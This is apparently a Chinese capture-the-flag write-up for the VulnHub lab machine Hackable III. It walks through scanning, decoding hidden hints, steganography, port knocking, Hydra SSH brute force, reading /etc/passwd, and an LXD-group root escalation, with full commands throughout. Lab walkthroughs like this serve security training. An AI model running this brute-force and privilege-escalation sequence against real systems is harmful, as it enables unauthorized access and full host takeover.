HACKABLE: III

文章目录

- - HACKABLE: III实战演练
  - - - 一、前期准备
      - 1、相关信息
      - 二、信息收集
      - 1、端口扫描
        2、访问网站
        3、查看网站源码
        4、扫描目录
        5、访问网址
        6、查看并下载
        7、访问网站
        8、查看文件
        9、解密
        10、访问网站
        11、访问网站
        12、查看文件
        13、解密
        14、访问网站
        15、访问网站
        16、下载图片
        17、隐写
        18、敲端口并端口扫描
        19、暴力破解
        20、远程连接
      - 三、后渗透
      - 1、查看文件
        2、查看文件
        3、切换用户
      - 四、提权
      - 1、提权
        2、访问目录

HACKABLE: III实战演练

一、前期准备

1、相关信息

靶机网站：https://www.vulnhub.com/entry/hackable-iii,720/

设备名称	IP地址
靶机：Hackable III	192.168.2.64
攻击机：kali	192.168.2.22

二、信息收集

1、端口扫描

kali@kali:~$ nmap -A 192.168.2.64

# 开放WEB：80端口

在这里插入图片描述

2、访问网站

http://192.168.2.64

在这里插入图片描述

3、查看网站源码

# 发现用户名：jubiscleudo	邮箱：dev_suport@hackable3.com和登录界面

在这里插入图片描述

4、扫描目录

kali@kaliL:~$ sudo dirsearch -u "http://192.168.2.64/"

在这里插入图片描述

5、访问网址

http://192.168.2.64/backup/

# 发现一个Wordlist.txt

在这里插入图片描述

6、查看并下载

kali@kali:~$ wget "http://192.168.2.64/backup/wordlist.txt"

在这里插入图片描述

7、访问网站

http://192.168.2.64/config/

# 发现一个1.txt文件

在这里插入图片描述

8、查看文件

# 发现是Base64编码

在这里插入图片描述

9、解密

网址：https://base64.us/

在这里插入图片描述

10、访问网站

http://192.168.2.64/config.php

# 查看源代码

在这里插入图片描述

11、访问网站

http://192.168.2.64/css/

# 发现2.txt

在这里插入图片描述

12、查看文件

# 发现是Brainfuck/Ook! 编码

在这里插入图片描述

13、解密

网址：https://tool.bugku.com/brainfuck/

# 将密文输入至文本框，点击BrainFuckToText

在这里插入图片描述

14、访问网站

http://192.168.2.64/login.php

# 查看源代码，发现有一个3.jpg

在这里插入图片描述

15、访问网站

http://192.168.2.64/3.jpg

# 发现是一张图片

在这里插入图片描述

16、下载图片

kali@kali:~$ wget "http://192.168.2.64/3.jpg"

在这里插入图片描述

17、隐写

kali@kali:~$ steghide extract -sf 3.jpg
kali@kali:~$ cat steganopayload148505.txt

在这里插入图片描述

18、敲端口并端口扫描

# 通过搜集信息，寻找到了三个端口地址：10000，4444，65535，敲端口，发现22端口开放

kali@kali:~$ knock 192.168.2.64 10000 4444 65535
kali@kali:~$ nmap -A 192.168.2.64

在这里插入图片描述

19、暴力破解

kali@kali:~$ hydra -l jubiscleudo -P /home/kali/wordlist.txt 192.168.2.64 ssh

# 用户名：jubiscleudo	密码：onlymy

在这里插入图片描述

20、远程连接

kali@kali:~$ ssh jubiscleudo@192.168.2.64

在这里插入图片描述

三、后渗透

1、查看文件

# 在网站目录下发现新用户名

jubiscleudo@ubuntu20:/var/www/html$ cat .backup_config.php

在这里插入图片描述

2、查看文件

# 查看系统是否存在此用户名

jubiscleudo@ubuntu20:~$ cat /etc/passwd

在这里插入图片描述

3、切换用户

jubiscleudo@ubuntu20:/var/www/html$ su hackable_3

在这里插入图片描述

四、提权

1、提权

访问网址：https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

# 通过id显示，查找后发现lxd有相关提权方式，选择其中一种方法，

# build a simple alpine image
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686# import the image
lxc image import ./alpine*.tar.gz --alias myimage # It's important doing this from YOUR HOME directory on the victim machine, or it might fail.# before running the image, start and configure the lxd storage pool as default 
lxd init# run the image
lxc init myimage mycontainer -c security.privileged=true# mount the /root into the image
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true# interact with the container
lxc start mycontainer
lxc exec mycontainer /bin/sh

hackable_3@ubuntu20:~$ git clone https://github.com/saghul/lxd-alpine-builder
hackable_3@ubuntu20:~$ cd lxd-alpine-builder
hackable_3@ubuntu20:~$ sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-hackable_3@ubuntu20:~$ releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
hackable_3@ubuntu20:~$ sudo ./build-alpine -a i686
hackable_3@ubuntu20:~$ lxc image import ./alpine*.tar.gz --alias myimage
hackable_3@ubuntu20:~$ lxd init
hackable_3@ubuntu20:~$ lxc init myimage mycontainer -c security.privileged=true
hackable_3@ubuntu20:~$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
hackable_3@ubuntu20:~$ lxc start mycontainer
hackable_3@ubuntu20:~$ lxc exec mycontainer /bin/sh